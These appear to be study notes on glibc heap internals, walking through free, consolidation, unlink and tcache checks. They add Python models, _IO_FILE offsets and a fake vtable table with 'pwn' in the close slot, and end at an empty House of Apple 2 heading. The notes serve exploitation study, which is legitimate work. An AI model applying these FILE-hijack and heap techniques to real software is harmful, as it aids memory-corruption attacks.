maxfb = &fastbin (av, NFASTBINS - 1); fb = &fastbin (av, 0); do { p = atomic_exchange_acq (fb, NULL); if (p != 0) { do { { if (__glibc_unlikely (misaligned_chunk (p))) malloc_printerr ("malloc_consolidate(): " "unaligned fastbin chunk detected"); unsigned int idx = fastbin_index (chunksize (p)); if ((&fastbin (av, idx)) != fb) malloc_printerr ("malloc_consolidate(): invalid chunk size"); }

- The loop walks every fastbin; each chunk must be aligned, and its size must map back to the fastbin it was found in.

check_inuse_chunk(av, p); nextp = REVEAL_PTR (p->fd); /* Slightly streamlined version of consolidation code in free() */ size = chunksize (p); nextchunk = chunk_at_offset(p, size); nextsize = chunksize(nextchunk); if (!prev_inuse(p)) { prevsize = prev_size (p); size += prevsize; p = chunk_at_offset(p, -((long) prevsize)); if (__glibc_unlikely (chunksize(p) != prevsize)) malloc_printerr ("corrupted size vs. prev_size in fastbins"); unlink_chunk (av, p); }

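- If the PREV_INUSE bit of p is zero, the physically previous chunk is free and p is consolidated backward with it.

- p is moved back by prevsize so that it points to the previous chunk, whose size must equal prevsize.

- unlink_chunk removes the previous chunk from its bin.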

if (nextchunk != av->top) { nextinuse = inuse_bit_at_offset(nextchunk, nextsize); if (!nextinuse) { size += nextsize; unlink_chunk (av, nextchunk); } else clear_inuse_bit_at_offset(nextchunk, 0); first_unsorted = unsorted_bin->fd; unsorted_bin->fd = p; first_unsorted->bk = p; if (!in_smallbin_range (size)) { p->fd_nextsize = NULL; p->bk_nextsize = NULL; } set_head(p, size | PREV_INUSE); p->bk = unsorted_bin; p->fd = first_unsorted; set_foot(p, size); }

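- inuse_bit_at_offset (nextchunk, nextsize) reads the PREV_INUSE bit of the chunk after nextchunk, which tells whether nextchunk itself is in use. If nextchunk is free, it is consolidated forward (unlinked, with its size added); if it is in use, its own PREV_INUSE bit is cleared to record that p is now free.

- p is then inserted at the head of the unsorted bin; if the consolidated size is in large-bin range, fd_nextsize and bk_nextsize are cleared.

- set_head updates the size field of the chunk and sets PREV_INUSE (the chunk before p is in use). set_foot writes the size into the prev_size field of the next chunk, at the end of the consolidated chunk.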

else { size += nextsize; set_head(p, size | PREV_INUSE); av->top = p; }

- Otherwise nextchunk is the top chunk: p is merged into it and becomes the new top.
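One detail that is easy to misread in the code above is that a chunk's in-use state is stored in the size field of the chunk that follows it. The sketch below models that with a dictionary mapping chunk addresses to size fields; the addresses and sizes are made up for illustration, and the helper names only mirror the glibc macros.

```python
PREV_INUSE = 0x1
SIZE_BITS = 0x7  # low three bits of the size field are flags


def chunksize(heap, p):
    return heap[p] & ~SIZE_BITS


def inuse_bit_at_offset(heap, p, off):
    # Reads PREV_INUSE of the chunk located at p + off.
    return heap[p + off] & PREV_INUSE


def clear_inuse_bit_at_offset(heap, p, off):
    heap[p + off] &= ~PREV_INUSE


# Hypothetical heap: address -> size field.
heap = {
    0x1000: 0x40 | PREV_INUSE,  # p, the fastbin chunk being consolidated
    0x1040: 0x80 | PREV_INUSE,  # nextchunk
    0x10C0: 0x20 | PREV_INUSE,  # chunk after nextchunk: says nextchunk is in use
}
p = 0x1000
nextchunk = p + chunksize(heap, p)
nextsize = chunksize(heap, nextchunk)
nextinuse = inuse_bit_at_offset(heap, nextchunk, nextsize)
if nextinuse:
    # nextchunk stays allocated; only record in its header that p is free.
    clear_inuse_bit_at_offset(heap, nextchunk, 0)
```

After this runs, the size field of nextchunk no longer carries PREV_INUSE, which is how a later free of nextchunk knows it can merge backward into p.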

malloc.c/unlink_chunk

static void

unlink_chunk (mstate av, mchunkptr p)

{

if (chunksize (p) != prev_size (next_chunk (p)))

malloc_printerr ("corrupted size vs. prev_size");

mchunkptr fd = p->fd;

mchunkptr bk = p->bk;

if (__builtin_expect (fd->bk != p || bk->fd != p, 0))

malloc_printerr ("corrupted double-linked list");

fd->bk = bk;

bk->fd = fd;

if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)

{

if (p->fd_nextsize->bk_nextsize != p

|| p->bk_nextsize->fd_nextsize != p)

malloc_printerr ("corrupted double-linked list (not small)");

if (fd->fd_nextsize == NULL)

{

if (p->fd_nextsize == p)

fd->fd_nextsize = fd->bk_nextsize = fd;

else

{

fd->fd_nextsize = p->fd_nextsize;

fd->bk_nextsize = p->bk_nextsize;

p->fd_nextsize->bk_nextsize = fd;

p->bk_nextsize->fd_nextsize = fd;

}

}

else

{

p->fd_nextsize->bk_nextsize = p->bk_nextsize;

p->bk_nextsize->fd_nextsize = p->fd_nextsize;

}

}

}

if (chunksize (p) != prev_size (next_chunk (p))) malloc_printerr ("corrupted size vs. prev_size");

- The size of p must equal the prev_size field of the next chunk.

mchunkptr fd = p->fd; mchunkptr bk = p->bk; if (__builtin_expect (fd->bk != p || bk->fd != p, 0)) malloc_printerr ("corrupted double-linked list");

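- fd->bk and bk->fd must both point back to p, which confirms that the doubly linked list is intact before p is removed.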

if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL) { if (p->fd_nextsize->bk_nextsize != p || p->bk_nextsize->fd_nextsize != p) malloc_printerr ("corrupted double-linked list (not small)"); if (fd->fd_nextsize == NULL) { if (p->fd_nextsize == p) fd->fd_nextsize = fd->bk_nextsize = fd; else { fd->fd_nextsize = p->fd_nextsize; fd->bk_nextsize = p->bk_nextsize; p->fd_nextsize->bk_nextsize = fd; p->bk_nextsize->fd_nextsize = fd; } } else { p->fd_nextsize->bk_nextsize = p->bk_nextsize; p->bk_nextsize->fd_nextsize = p->fd_nextsize; } }

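Chunks in large-bin range that are linked on the nextsize list need separate handling.

if (p->fd_nextsize->bk_nextsize != p || p->bk_nextsize->fd_nextsize != p) malloc_printerr ("corrupted double-linked list (not small)"); is the same integrity check as above, applied to the nextsize pointers.

The nextsize list is then relinked: if fd is not yet on the nextsize list it takes over p's position, otherwise p is simply removed from that list.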
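The fd/bk part of unlink_chunk can be illustrated with a small Python model of a circular doubly linked bin. It is a sketch under simplifying assumptions: the `Chunk` class and `insert_after` helper are hypothetical, and the size/prev_size check and the nextsize list are left out.

```python
class Chunk:
    def __init__(self, name):
        self.name = name
        self.fd = self.bk = self  # an empty circular list points to itself


def insert_after(head, c):
    """Link c right after head (the head of a bin)."""
    c.fd, c.bk = head.fd, head
    head.fd.bk = c
    head.fd = c


def unlink_chunk(p):
    fd, bk = p.fd, p.bk
    # Both neighbours must point back to p, otherwise the list is corrupted.
    if fd.bk is not p or bk.fd is not p:
        raise RuntimeError("corrupted double-linked list")
    fd.bk = bk
    bk.fd = fd
```

The check is what defeats the classic unlink attack: overwriting p's fd or bk with arbitrary addresses fails unless those addresses already contain pointers back to p.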

malloc.c/__libc_free

void

__libc_free (void *mem)

{

mstate ar_ptr;

mchunkptr p; /* chunk corresponding to mem */

if (mem == 0) /* free(0) has no effect */

return;

/* Quickly check that the freed pointer matches the tag for the memory.

This gives a useful double-free detection. */

if (__glibc_unlikely (mtag_enabled))

*(volatile char *)mem;

int err = errno;

p = mem2chunk (mem);

if (chunk_is_mmapped (p)) /* release mmapped memory. */

{

/* See if the dynamic brk/mmap threshold needs adjusting.

Dumped fake mmapped chunks do not affect the threshold. */

if (!mp_.no_dyn_threshold

&& chunksize_nomask (p) > mp_.mmap_threshold

&& chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX)

{

mp_.mmap_threshold = chunksize (p);

mp_.trim_threshold = 2 * mp_.mmap_threshold;

LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,

mp_.mmap_threshold, mp_.trim_threshold);

}

munmap_chunk (p);

}

else

{

MAYBE_INIT_TCACHE ();

/* Mark the chunk as belonging to the library again. */

(void)tag_region (chunk2mem (p), memsize (p));

ar_ptr = arena_for_chunk (p);

_int_free (ar_ptr, p, 0);

}

__set_errno (err);

}

if (mem == 0) return; free(NULL) has no effect.

if (chunk_is_mmapped (p)) { if (!mp_.no_dyn_threshold && chunksize_nomask (p) > mp_.mmap_threshold && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX) { mp_.mmap_threshold = chunksize (p); mp_.trim_threshold = 2 * mp_.mmap_threshold; LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2, mp_.mmap_threshold, mp_.trim_threshold); } munmap_chunk (p); }

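- This branch is taken when the chunk p being freed was allocated with mmap.

- !mp_.no_dyn_threshold means dynamic threshold adjustment is enabled. If the chunk is larger than the current mmap_threshold and no larger than DEFAULT_MMAP_THRESHOLD_MAX, mmap_threshold is raised to the size of the freed chunk and trim_threshold (the heap trim threshold) is set to twice that value, which avoids trimming the heap too often.

- munmap_chunk releases the chunk.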
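The dynamic threshold adjustment can be sketched like this. It is an illustrative model only: `on_free_mmapped` is a hypothetical name, flag bits in the size field are ignored, and the 32 MiB upper bound is the value assumed for 64-bit builds.

```python
DEFAULT_MMAP_THRESHOLD_MAX = 4 * 1024 * 1024 * 8  # assumed 64-bit value (32 MiB)


def on_free_mmapped(size, mmap_threshold, trim_threshold, no_dyn_threshold=False):
    """Return the (mmap_threshold, trim_threshold) pair after freeing an mmapped chunk."""
    if (not no_dyn_threshold
            and size > mmap_threshold
            and size <= DEFAULT_MMAP_THRESHOLD_MAX):
        mmap_threshold = size
        trim_threshold = 2 * mmap_threshold
    return mmap_threshold, trim_threshold
```

With the default 128 KB thresholds, freeing a 256 KB mmapped chunk raises mmap_threshold to 256 KB, so a later request of that size is served from the heap instead of a new mapping.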

{ MAYBE_INIT_TCACHE (); /* Mark the chunk as belonging to the library again. */ (void)tag_region (chunk2mem (p), memsize (p)); ar_ptr = arena_for_chunk (p); _int_free (ar_ptr, p, 0); }

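- (void)tag_region (chunk2mem (p), memsize (p)); re-tags the memory as belonging to the library (memory tagging).

- arena_for_chunk finds the arena that p belongs to from the chunk's metadata.

- _int_free is called to release the chunk.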

malloc.c/_int_free

INTERNAL_SIZE_T size; /* its size */ mfastbinptr *fb; /* associated fastbin */ mchunkptr nextchunk; /* next contiguous chunk */ INTERNAL_SIZE_T nextsize; /* its size */ int nextinuse; /* true if nextchunk is used */ INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */ mchunkptr bck; /* misc temp for linking */ mchunkptr fwd; /* misc temp for linking */

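| Variable | Type | Description |
|---|---|---|
| size | INTERNAL_SIZE_T | Size of the current chunk (including the chunk header). |
| fb | mfastbinptr* | Pointer to the associated fastbin (used for fast allocation of small chunks). |
| nextchunk | mchunkptr | The physically adjacent next chunk. |
| nextsize | INTERNAL_SIZE_T | Size of the next chunk. |
| nextinuse | int | Whether the next chunk is in use (prevents a wrong merge). |
| prevsize | INTERNAL_SIZE_T | Size of the previous chunk (used for consolidation). |
| bck, fwd | mchunkptr | Temporary pointers for list operations (such as inserting into a bin). |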

if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0) || __builtin_expect (misaligned_chunk (p), 0)) malloc_printerr ("free(): invalid pointer"); if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size))) malloc_printerr ("free(): invalid size"); check_inuse_chunk(av, p);

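- The pointer is validated first: p plus size must not wrap around the address space, and p must be aligned.

- size must be at least MINSIZE and a multiple of the alignment.

- check_inuse_chunk() verifies that the chunk is marked in use (it is only active when glibc is built with MALLOC_DEBUG).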

#if USE_TCACHE { size_t tc_idx = csize2tidx (size); if (tcache != NULL && tc_idx < mp_.tcache_bins) { tcache_entry *e = (tcache_entry *) chunk2mem (p); if (__glibc_unlikely (e->key == tcache_key)) { tcache_entry *tmp; size_t cnt = 0; LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx); for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next), ++cnt) { if (cnt >= mp_.tcache_count) malloc_printerr ("free(): too many chunks detected in tcache"); if (__glibc_unlikely (!aligned_OK (tmp))) malloc_printerr ("free(): unaligned chunk detected in tcache 2"); if (tmp == e) malloc_printerr ("free(): double free detected in tcache 2"); } } if (tcache->counts[tc_idx] < mp_.tcache_count) { tcache_put (p, tc_idx); return; } } } #endif

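- The chunk is checked against the tcache requirements (tcache != NULL and tc_idx < mp_.tcache_bins).

- e->key == tcache_key is the double-free check. tcache_put sets e->key = tcache_key when a chunk enters the tcache and tcache_get clears it when the chunk is handed out, so a matching key on free means the chunk may already be in the tcache. Because the match can also be a coincidence, the bin is then walked to look for e.

- If the bin is not full (counts[tc_idx] < mp_.tcache_count), the chunk is put into the tcache and _int_free returns.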
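The key-based double-free detection can be modelled in a few lines of Python. This is a sketch, not glibc's implementation: `Entry`, `free_to_tcache` and the fixed `TCACHE_KEY` are assumptions for illustration (glibc picks a random key at startup), and the per-bin count limit and pointer protection are omitted.

```python
TCACHE_KEY = 0x5EEDC0DE  # hypothetical fixed value; glibc uses a random key


class Entry:
    def __init__(self):
        self.next = None
        self.key = 0


def tcache_put(bins, idx, e):
    e.key = TCACHE_KEY      # mark the chunk as "in the tcache"
    e.next = bins[idx]
    bins[idx] = e


def tcache_get(bins, idx):
    e = bins[idx]
    bins[idx] = e.next
    e.key = 0               # the chunk leaves the tcache, so the mark is cleared
    return e


def free_to_tcache(bins, idx, e):
    if e.key == TCACHE_KEY:
        # The key matches: confirm by walking the bin, as _int_free does.
        tmp = bins[idx]
        while tmp is not None:
            if tmp is e:
                raise RuntimeError("free(): double free detected in tcache 2")
            tmp = tmp.next
    tcache_put(bins, idx, e)
```

Freeing the same entry twice in a row raises, while free, get, free succeeds because tcache_get resets the key.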

if ((unsigned long)(size) <= (unsigned long)(get_max_fast ()) #if TRIM_FASTBINS && (chunk_at_offset(p, size) != av->top) #endif )

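- Checks whether the chunk size is within the fastbin range (size <= get_max_fast ()).

- If TRIM_FASTBINS is 1, a chunk that borders the top chunk is not placed in a fastbin.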

if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ, 0) || __builtin_expect (chunksize (chunk_at_offset (p, size)) >= av->system_mem, 0)) { bool fail = true; if (!have_lock) { __libc_lock_lock (av->mutex); fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ || chunksize (chunk_at_offset (p, size)) >= av->system_mem); __libc_lock_unlock (av->mutex); } if (fail) malloc_printerr ("free(): invalid next size (fast)"); }

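- Validates the next physically adjacent chunk: its size must be larger than CHUNK_HDR_SZ and smaller than av->system_mem. If the arena lock is not held, the check is repeated under the lock before an error is reported.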

free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ); atomic_store_relaxed (&av->have_fastchunks, true); unsigned int idx = fastbin_index(size); fb = &fastbin (av, idx); mchunkptr old = *fb, old2;

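- free_perturb fills the user data with the perturb byte when one is configured (it does nothing by default).

- atomic_store_relaxed sets the arena's have_fastchunks flag atomically, without taking a lock, to record that the fastbins now hold free chunks.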

if (SINGLE_THREAD_P) { if (__builtin_expect (old == p, 0)) malloc_printerr ("double free or corruption (fasttop)"); p->fd = PROTECT_PTR (&p->fd, old); *fb = p; } else do { if (__builtin_expect (old == p, 0)) malloc_printerr ("double free or corruption (fasttop)"); old2 = old; p->fd = PROTECT_PTR (&p->fd, old); } while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2); if (have_lock && old != NULL && __builtin_expect (fastbin_index (chunksize (old)) != idx, 0)) malloc_printerr ("invalid fastbin entry (free)");

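- old == p: if the chunk being freed is already the head of its fastbin, this is a double free.

- With multiple threads, the same check and the insertion are repeated in a compare-and-exchange loop until the head is updated.

- The size of the old head, chunksize(old), must map to the same fastbin index idx.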
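The line p->fd = PROTECT_PTR (&p->fd, old) applies safe-linking: the stored pointer is XORed with the address of the field shifted right by 12 bits. A minimal Python model of the arithmetic, with made-up heap addresses, looks like this:

```python
def protect_ptr(pos, ptr):
    """Model of PROTECT_PTR: pos is the address of the fd field, ptr the real pointer."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos, stored):
    """Model of REVEAL_PTR: XOR with the same mask recovers the pointer."""
    return protect_ptr(pos, stored)


# Hypothetical addresses for illustration.
fd_field_addr = 0x55555555A2A0
old_head = 0x55555555A310
stored = protect_ptr(fd_field_addr, old_head)
```

When the bin was empty (old is NULL), the stored value is simply fd_field_addr >> 12, which is why leaking the fd of the first freed chunk reveals the heap base shifted by 12 bits.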

else if (!chunk_is_mmapped(p)) { /* If we're single-threaded, don't lock the arena. */ if (SINGLE_THREAD_P) have_lock = true; if (!have_lock) __libc_lock_lock (av->mutex); nextchunk = chunk_at_offset(p, size); /* Lightweight tests: check whether the block is already the top block. */ if (__glibc_unlikely (p == av->top)) malloc_printerr ("double free or corruption (top)"); /* Or whether the next chunk is beyond the boundaries of the arena. */ if (__builtin_expect (contiguous (av) && (char *) nextchunk >= ((char *) av->top + chunksize(av->top)), 0)) malloc_printerr ("double free or corruption (out)"); /* Or whether the block is actually not marked used. */ if (__glibc_unlikely (!prev_inuse(nextchunk))) malloc_printerr ("double free or corruption (!prev)"); nextsize = chunksize(nextchunk); if (__builtin_expect (chunksize_nomask (nextchunk) <= CHUNK_HDR_SZ, 0) || __builtin_expect (nextsize >= av->system_mem, 0)) malloc_printerr ("free(): invalid next size (normal)"); free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);

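- This branch is taken when the chunk is not fastbin-sized and was not allocated with mmap.

- Checks: the chunk being freed is not the top chunk, the next chunk does not lie beyond the end of top, the next chunk's PREV_INUSE bit is set, and the next chunk's size is valid.

- free_perturb fills the user data.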

if (!prev_inuse(p)) { prevsize = prev_size (p); size += prevsize; p = chunk_at_offset(p, -((long) prevsize)); if (__glibc_unlikely (chunksize(p) != prevsize)) malloc_printerr ("corrupted size vs. prev_size while consolidating"); unlink_chunk (av, p); }

- Backward consolidation with the previous chunk.

if (nextchunk != av->top) { /* get and clear inuse bit */ nextinuse = inuse_bit_at_offset(nextchunk, nextsize); /* consolidate forward */ if (!nextinuse) { unlink_chunk (av, nextchunk); size += nextsize; } else clear_inuse_bit_at_offset(nextchunk, 0); /* Place the chunk in unsorted chunk list. Chunks are not placed into regular bins until after they have been given one chance to be used in malloc. */ bck = unsorted_chunks(av); fwd = bck->fd; if (__glibc_unlikely (fwd->bk != bck)) malloc_printerr ("free(): corrupted unsorted chunks"); p->fd = fwd; p->bk = bck; if (!in_smallbin_range(size)) { p->fd_nextsize = NULL; p->bk_nextsize = NULL; } bck->fd = p; fwd->bk = p; set_head(p, size | PREV_INUSE); set_foot(p, size); check_free_chunk(av, p); }

- Forward consolidation with the next chunk.

- The chunk is inserted into the unsorted bin, and its head and foot are set.

else { size += nextsize; set_head(p, size | PREV_INUSE); av->top = p; check_chunk(av, p); }

- If the next chunk is the top chunk, the freed chunk is merged into top.

if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) { if (atomic_load_relaxed (&av->have_fastchunks)) malloc_consolidate(av); if (av == &main_arena) { #ifndef MORECORE_CANNOT_TRIM if ((unsigned long)(chunksize(av->top)) >= (unsigned long)(mp_.trim_threshold)) systrim(mp_.top_pad, av); #endif } else { heap_info *heap = heap_for_ptr(top(av)); assert(heap->ar_ptr == av); heap_trim(heap, mp_.top_pad); } }

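- FASTBIN_CONSOLIDATION_THRESHOLD is 65536 bytes (64 KB). When the freed chunk, after consolidation, is at least this large, heap consolidation and trimming are triggered.

- malloc_consolidate(av); consolidates the fastbins if any fastbin chunks exist.

- For the main arena, systrim() shrinks the heap through sbrk() and returns memory to the operating system only when the top chunk size is >= trim_threshold (128 KB by default).

- Non-main arenas (for example thread arenas) always try heap_trim(), even when the top chunk is small, because their heaps are allocated with mmap and may be released entirely.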

else { munmap_chunk (p); }

- If the chunk was allocated with mmap, munmap_chunk releases it.

check_inuse_chunk()

do_check_inuse_chunk (mstate av, mchunkptr p)

{

mchunkptr next;

do_check_chunk (av, p);

if (chunk_is_mmapped (p))

return; /* mmapped chunks have no next/prev */

/* Check whether it claims to be in use ... */

assert (inuse (p));

next = next_chunk (p);

/* ... and is surrounded by OK chunks.

Since more things can be checked with free chunks than inuse ones,

if an inuse chunk borders them and debug is on, it's worth doing them.

*/

if (!prev_inuse (p))

{

/* Note that we cannot even look at prev unless it is not inuse */

mchunkptr prv = prev_chunk (p);

assert (next_chunk (prv) == p);

do_check_free_chunk (av, prv);

}

if (next == av->top)

{

assert (prev_inuse (next));

assert (chunksize (next) >= MINSIZE);

}

else if (!inuse (next))

do_check_free_chunk (av, next);

}

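- do_check_chunk() performs the basic checks.

- An mmapped chunk returns immediately.

- If the PREV_INUSE bit of the chunk is zero, the previous chunk is free: its next chunk must be p, and do_check_free_chunk checks it further.

- If the next chunk is the top chunk, top is validated.

- Otherwise, if the next chunk is free, it is checked with do_check_free_chunk.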

tcache_put

static __always_inline void

tcache_put (mchunkptr chunk, size_t tc_idx)

{

tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will

detect a double free. */

e->key = tcache_key;

e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);

tcache->entries[tc_idx] = e;

++(tcache->counts[tc_idx]);

}

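- e->key is set so that _int_free can detect a double free.

- The chunk is inserted at the head of the tcache list for its size (tc_idx).

- The counter of that tcache bin is incremented; it records the number of chunks on the list.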

do_check_free_chunk

do_check_free_chunk (mstate av, mchunkptr p)

{

INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);

mchunkptr next = chunk_at_offset (p, sz);

do_check_chunk (av, p);

/* Chunk must claim to be free ... */

assert (!inuse (p));

assert (!chunk_is_mmapped (p));

/* Unless a special marker, must have OK fields */

if ((unsigned long) (sz) >= MINSIZE)

{

assert ((sz & MALLOC_ALIGN_MASK) == 0);

assert (aligned_OK (chunk2mem (p)));

/* ... matching footer field */

assert (prev_size (next_chunk (p)) == sz);

/* ... and is fully consolidated */

assert (prev_inuse (p));

assert (next == av->top || inuse (next));

/* ... and has minimally sane links */

assert (p->fd->bk == p);

assert (p->bk->fd == p);

}

else /* markers are always of size SIZE_SZ */

assert (sz == SIZE_SZ);

}

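- The chunk is checked for:

- a clear inuse bit

- not being mmapped

- minimum size

- alignment

- the prev_size of the next chunk

- being fully consolidated (previous and next chunks in use)

- list integrity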

munmap_chunk

static void

munmap_chunk (mchunkptr p)

{

size_t pagesize = GLRO (dl_pagesize);

INTERNAL_SIZE_T size = chunksize (p);

assert (chunk_is_mmapped (p));

uintptr_t mem = (uintptr_t) chunk2mem (p);

uintptr_t block = (uintptr_t) p - prev_size (p);

size_t total_size = prev_size (p) + size;

/* Unfortunately we have to do the compilers job by hand here. Normally

we would test BLOCK and TOTAL-SIZE separately for compliance with the

page size. But gcc does not recognize the optimization possibility

(in the moment at least) so we combine the two values into one before

the bit test. */

if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0

|| __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))

malloc_printerr ("munmap_chunk(): invalid pointer");

atomic_decrement (&mp_.n_mmaps);

atomic_add (&mp_.mmapped_mem, -total_size);

/* If munmap failed the process virtual memory address space is in a

bad shape. Just leave the block hanging around, the process will

terminate shortly anyway since not much can be done. */

__munmap ((char *) block, total_size);

}

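- Checks the mmapped chunk:

- block and total_size must be aligned to the system page size (for example 4 KB).

- mem (the user data pointer) must have an offset within its page that is zero or a power of two.

- The global mp_ is updated; it tracks the memory the process has allocated with mmap.

- __munmap releases the memory.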
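The two pointer checks in munmap_chunk can be reproduced with plain integer arithmetic. The sketch below is a model, not glibc code: `munmap_chunk_ok` is a hypothetical name, and the 0x10-byte chunk header and 4 KB page size are assumptions for a typical 64-bit system.

```python
CHUNK_HDR_SZ = 0x10  # assumed header size on 64-bit


def powerof2(x):
    # Same expression as the powerof2 macro; true for 0 as well.
    return ((x - 1) & x) == 0


def munmap_chunk_ok(p, prev_size, size, pagesize=4096):
    """Return True when the chunk at address p passes both checks."""
    mem = p + CHUNK_HDR_SZ
    block = p - prev_size           # start of the mapping
    total_size = prev_size + size   # length of the mapping
    if (block | total_size) & (pagesize - 1):
        return False                # start or length is not page-aligned
    if not powerof2(mem & (pagesize - 1)):
        return False                # offset of mem within the page is not a power of two
    return True
```

ORing block and total_size before masking tests both values for page alignment with a single comparison, which is the hand optimisation the source comment describes.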

do_check_chunk

static void

do_check_chunk (mstate av, mchunkptr p)

{

unsigned long sz = chunksize (p);

/* min and max possible addresses assuming contiguous allocation */

char *max_address = (char *) (av->top) + chunksize (av->top);

char *min_address = max_address - av->system_mem;

if (!chunk_is_mmapped (p))

{

/* Has legal address ... */

if (p != av->top)

{

if (contiguous (av))

{

assert (((char *) p) >= min_address);

assert (((char *) p + sz) <= ((char *) (av->top)));

}

}

else

{

/* top size is always at least MINSIZE */

assert ((unsigned long) (sz) >= MINSIZE);

/* top predecessor always marked inuse */

assert (prev_inuse (p));

}

}

else

{

/* address is outside main heap */

if (contiguous (av) && av->top != initial_top (av))

{

assert (((char *) p) < min_address || ((char *) p) >= max_address);

}

/* chunk is page-aligned */

assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);

/* mem is aligned */

assert (aligned_OK (chunk2mem (p)));

}

}

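- If the chunk was not allocated with mmap:

- a chunk other than top must lie inside the heap region (when the arena is contiguous)

- the top chunk must be at least MINSIZE with PREV_INUSE set

- If the chunk was allocated with mmap:

- it must lie outside the main heap

- its mapping must be page-aligned and mem must be aligned.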

IO_FILE

The _IO_FILE structure (field offsets on 64-bit)

0x0 _flags

0x8 _IO_read_ptr

0x10 _IO_read_end

0x18 _IO_read_base

0x20 _IO_write_base

0x28 _IO_write_ptr

0x30 _IO_write_end

0x38 _IO_buf_base

0x40 _IO_buf_end

0x48 _IO_save_base

0x50 _IO_backup_base

0x58 _IO_save_end

0x60 _markers

0x68 _chain

0x70 _fileno

0x74 _flags2

0x78 _old_offset

0x80 _cur_column

0x82 _vtable_offset

0x83 _shortbuf

0x88 _lock

0x90 _offset

0x98 _codecvt

0xa0 _wide_data

0xa8 _freeres_list

0xb0 _freeres_buf

0xb8 __pad5

0xc0 _mode

0xc4 _unused2

0xd8 vtable

struct _IO_FILE {

int _flags; /* High-order word is _IO_MAGIC; rest is flags. */

#define _IO_file_flags _flags

/* The following pointers correspond to the C++ streambuf protocol. */

/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */

char* _IO_read_ptr; /* Current read pointer */

char* _IO_read_end; /* End of get area. */

char* _IO_read_base; /* Start of putback+get area. */

char* _IO_write_base; /* Start of put area. */

char* _IO_write_ptr; /* Current put pointer. */

char* _IO_write_end; /* End of put area. */

char* _IO_buf_base; /* Start of reserve area. */

char* _IO_buf_end; /* End of reserve area. */

/* The following fields are used to support backing up and undo. */

char *_IO_save_base; /* Pointer to start of non-current get area. */

char *_IO_backup_base; /* Pointer to first valid character of backup area */

char *_IO_save_end; /* Pointer to end of non-current get area. */

struct _IO_marker *_markers;

struct _IO_FILE *_chain;

int _fileno;

#if 0

int _blksize;

#else

int _flags2;

#endif

_IO_off_t _old_offset; /* This used to be _offset but it's too small. */

#define __HAVE_COLUMN /* temporary */

/* 1+column number of pbase(); 0 is unknown. */

unsigned short _cur_column;

signed char _vtable_offset;

char _shortbuf[1];

/* char* _save_gptr; char* _save_egptr; */

_IO_lock_t *_lock;

#ifdef _IO_USE_OLD_IO_FILE

};

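FILE structures are linked into a list through struct _IO_FILE *_chain, which sits at offset 0x68 in 64-bit programs.

The head of the list is the _IO_list_all pointer. _IO_list_all -> stderr -> stdout -> stdin form the list.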
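The offsets in the table above follow from ordinary C alignment rules. The sketch below recomputes them with a tiny layout calculator; the field sizes and alignments are the ones assumed for x86-64 (4-byte int, 8-byte pointers and _IO_off_t), and `layout` is a hypothetical helper, not a glibc or pwntools function.

```python
def layout(fields):
    """Compute field offsets from (name, size, alignment) triples."""
    offsets, off = {}, 0
    for name, size, align in fields:
        off = (off + align - 1) & ~(align - 1)  # round up to the field's alignment
        offsets[name] = off
        off += size
    return offsets


POINTERS = ["_IO_read_ptr", "_IO_read_end", "_IO_read_base",
            "_IO_write_base", "_IO_write_ptr", "_IO_write_end",
            "_IO_buf_base", "_IO_buf_end", "_IO_save_base",
            "_IO_backup_base", "_IO_save_end", "_markers", "_chain"]

FIELDS = ([("_flags", 4, 4)]
          + [(name, 8, 8) for name in POINTERS]
          + [("_fileno", 4, 4), ("_flags2", 4, 4), ("_old_offset", 8, 8),
             ("_cur_column", 2, 2), ("_vtable_offset", 1, 1),
             ("_shortbuf", 1, 1), ("_lock", 8, 8)])

offsets = layout(FIELDS)
```

`offsets["_chain"]` comes out as 0x68 and `offsets["_lock"]` as 0x88, matching the listing, while 0x60 belongs to _markers.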

IO_jump_t

void * funcs[] = {

NULL, // "extra word"

NULL, // DUMMY

exit, // finish

NULL, // overflow

NULL, // underflow

NULL, // uflow

NULL, // pbackfail

NULL, // xsputn #printf

NULL, // xsgetn

NULL, // seekoff

NULL, // seekpos

NULL, // setbuf

NULL, // sync

NULL, // doallocate

NULL, // read

NULL, // write

NULL, // seek

pwn, // close

NULL, // stat

NULL, // showmanyc

NULL, // imbue

};

_IO_wide_data

struct _IO_wide_data

{

wchar_t *_IO_read_ptr; /* Current read pointer */

wchar_t *_IO_read_end; /* End of get area. */

wchar_t *_IO_read_base; /* Start of putback+get area. */

wchar_t *_IO_write_base; /* Start of put area. */

wchar_t *_IO_write_ptr; /* Current put pointer. */

wchar_t *_IO_write_end; /* End of put area. */

wchar_t *_IO_buf_base; /* Start of reserve area. */

wchar_t *_IO_buf_end; /* End of reserve area. */

/* The following fields are used to support backing up and undo. */

wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */

wchar_t *_IO_backup_base; /* Pointer to first valid character of

backup area */

wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */

__mbstate_t _IO_state;

__mbstate_t _IO_last_state;

struct _IO_codecvt _codecvt;

wchar_t _shortbuf[1];

const struct _IO_jump_t *_wide_vtable;

};

House of Apple 2 analysis

